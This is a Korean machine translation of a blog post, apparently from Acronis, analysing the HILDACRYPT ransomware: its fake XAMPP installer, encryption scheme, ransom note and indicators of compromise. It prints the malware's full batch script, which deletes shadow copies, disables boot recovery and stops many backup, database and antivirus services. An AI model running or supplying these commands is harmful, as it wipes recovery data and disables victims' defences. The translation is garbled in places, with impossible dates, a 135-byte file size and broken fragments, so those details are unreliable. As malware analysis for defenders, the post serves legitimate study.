HILDACRYPT: 새로운 랜섬웨어가 백업 시스템과 바이러스 백신 솔루션을 공격합니다

안녕, 하브르! 다시 한번 랜섬웨어 카테고리의 최신 버전의 맬웨어에 대해 이야기하고 있습니다. HILDACRYPT는 2019년 XNUMX월에 발견된 Hilda 계열의 새로운 랜섬웨어로, 소프트웨어 배포에 사용된 Netflix 만화의 이름을 따서 명명되었습니다. 오늘 우리는 업데이트된 랜섬웨어 바이러스의 기술적 특징에 대해 알아가고 있습니다.

Hilda 랜섬웨어의 첫 번째 버전에서는 Youtube에 게시된 링크 예고편 몸값 편지에는 만화 시리즈가 포함되어 있었습니다. HILDACRYPT는 MariaDB, PHP 및 Perl을 포함하는 설치가 쉬운 Apache 배포판인 합법적인 XAMPP 설치 프로그램으로 가장합니다. 동시에 cryptolocker의 파일 이름은 xamp.x입니다. 게다가 랜섬웨어 파일에는 전자서명이 없습니다.

정적 분석

랜섬웨어는 MS Windows용으로 작성된 PE32 .NET 파일에 포함되어 있습니다. 크기는 135바이트입니다. 기본 프로그램 코드와 방어자 프로그램 코드는 모두 C#으로 작성되었습니다. 컴파일 날짜와 타임스탬프에 따르면 바이너리는 168년 14월 2019일에 생성되었습니다.

Detect It Easy에 따르면 해당 랜섬웨어는 Confuser와 ConfuserEx를 사용해 보관되지만 이들 난독화 장치는 이전과 동일하며 ConfuserEx만 Confuser의 후속 제품이므로 코드 서명이 유사합니다.

HILDACRYPT는 실제로 ConfuserEx와 함께 패키지되어 있습니다.

SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

공격 벡터

아마도 이 랜섬웨어는 합법적인 XAMPP 프로그램으로 가장한 웹 프로그래밍 사이트 중 하나에서 발견되었을 가능성이 높습니다.

감염의 전체 사슬은 다음에서 볼 수 있습니다. app.any.run 샌드박스.

난처

랜섬웨어 문자열은 암호화된 형태로 저장됩니다. HILDACRYPT는 실행되면 Base64 및 AES-256-CBC를 사용하여 암호를 해독합니다.

설치

우선 랜섬웨어는 %AppDataRoaming%에 GUID(Globally Unique Identifier) ​​매개변수가 무작위로 생성되는 폴더를 생성합니다. 이 위치에 bat 파일을 추가하면 랜섬웨어 바이러스는 cmd.exe를 사용하여 해당 파일을 시작합니다.

cmd.exe /c JKfgkgj3hjgfhjka.bat 및 종료


그런 다음 배치 스크립트 실행을 시작하여 시스템 기능이나 서비스를 비활성화합니다.

이 스크립트에는 섀도 복사본을 삭제하고 SQL 서버, 백업 및 바이러스 백신 솔루션을 비활성화하는 긴 명령 목록이 포함되어 있습니다.

예를 들어 Acronis Backup 서비스를 중지하려고 시도했지만 실패했습니다. 또한 Veeam, Sophos, Kaspersky, McAfee 등 공급업체의 백업 시스템과 바이러스 백신 솔루션을 공격합니다.

@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0

위에서 언급한 서비스와 프로세스가 비활성화되면 cryptolocker는 tasklist 명령을 사용하여 실행 중인 모든 프로세스에 대한 정보를 수집하여 필요한 모든 서비스가 중단되었는지 확인합니다.
작업 목록 v/fo csv

이 명령은 실행 중인 프로세스의 세부 목록을 표시하며, 해당 요소는 "," 기호로 구분됩니다.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»

이 확인 후 랜섬웨어는 암호화 프로세스를 시작합니다.

암호화

파일 암호화

HILDACRYPT는 Recycle.Bin 및 Reference AssembliesMicrosoft 폴더를 제외하고 하드 드라이브에서 발견된 모든 내용을 검사합니다. 후자에는 랜섬웨어 작동에 영향을 미칠 수 있는 .Net 애플리케이션용 중요한 dll, pdb 등의 파일이 포함되어 있습니다. 암호화할 파일을 검색하려면 다음 확장자 목록이 사용됩니다.

«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»

랜섬웨어는 AES-256-CBC 알고리즘을 사용하여 사용자 파일을 암호화합니다. 키 크기는 256비트이고 IV(초기화 벡터) 크기는 16바이트입니다.

다음 스크린샷에서는 GetBytes()를 사용하여 byte_2 및 byte_1의 값을 무작위로 얻었습니다.

열쇠

과에서

암호화된 파일의 확장자는 HCY!입니다. 이것은 암호화된 파일의 예입니다. 위에서 언급한 키와 IV는 이 파일용으로 생성되었습니다.

키 암호화

cryptolocker는 생성된 AES 키를 암호화된 파일에 저장합니다. 암호화된 파일의 첫 번째 부분에는 XML 형식의 HILDACRYPT, KEY, IV, FileLen과 같은 데이터가 포함된 헤더가 있으며 다음과 같습니다.

AES 및 IV 키 암호화는 RSA-2048을 사용하여 수행되며 인코딩은 Base64를 사용하여 수행됩니다. RSA 공개 키는 XML 형식의 암호화된 문자열 중 하나로 cryptolocker 본문에 저장됩니다.

28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB


RSA 공개 키는 AES 파일 키를 암호화하는 데 사용됩니다. RSA 공개 키는 Base64로 인코딩되며 모듈러스와 65537의 공개 지수로 구성됩니다. 암호 해독에는 공격자가 갖고 있는 RSA 개인 키가 필요합니다.

RSA 암호화 후 AES 키는 암호화된 파일에 저장된 Base64를 사용하여 인코딩됩니다.

몸값 메시지

암호화가 완료되면 HILDACRYPT는 파일을 암호화한 폴더에 html 파일을 씁니다. 랜섬웨어 알림에는 피해자가 공격자에게 연락할 수 있는 두 개의 이메일 주소가 포함되어 있습니다.

• [이메일 보호]
  [이메일 보호]

강탈 통지문에는 "로리는 안전하지 않습니다.)"라는 문구도 포함되어 있습니다. 이는 일본에서 금지된 어린 소녀의 등장이 포함된 애니메이션 및 만화 캐릭터에 대한 언급입니다.

출력

새로운 랜섬웨어 계열인 HILDACRYPT가 새 버전을 출시했습니다. 암호화 모델은 피해자가 랜섬웨어로 암호화된 파일을 해독하는 것을 방지합니다. Cryptolocker는 능동 보호 방법을 사용하여 백업 시스템 및 바이러스 백신 솔루션과 관련된 보호 서비스를 비활성화합니다. HILDACRYPT의 저자는 Netflix에 표시된 애니메이션 시리즈 Hilda의 팬입니다. 예고편 링크는 프로그램의 이전 버전에 대한 구매 편지에 포함되어 있습니다.

일반적으로 아크로니스 백업 и 아크로니스 트루 이미지 HILDACRYPT 랜섬웨어로부터 컴퓨터를 보호할 수 있으며 제공업체는 다음과 같은 방법으로 고객을 보호할 수 있습니다. Acronis 백업 클라우드. 이러한 솔루션에는 다음이 포함되어 보호가 보장됩니다. 사이버 보안 백업뿐만 아니라 통합 보안 시스템도 포함되어 있습니다. Acronis 액티브 프로텍션 - 기계 학습 모델과 행동 휴리스틱을 기반으로 하는 이 기술은 제로데이 랜섬웨어의 위협에 가장 효과적으로 대응할 수 있습니다.

타협의 지표

파일 확장자 HCY!
HILDACRYPTReadMe.html
문자 "p"가 하나 있고 디지털 서명이 없는 xamp.exe
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

출처 : habr.com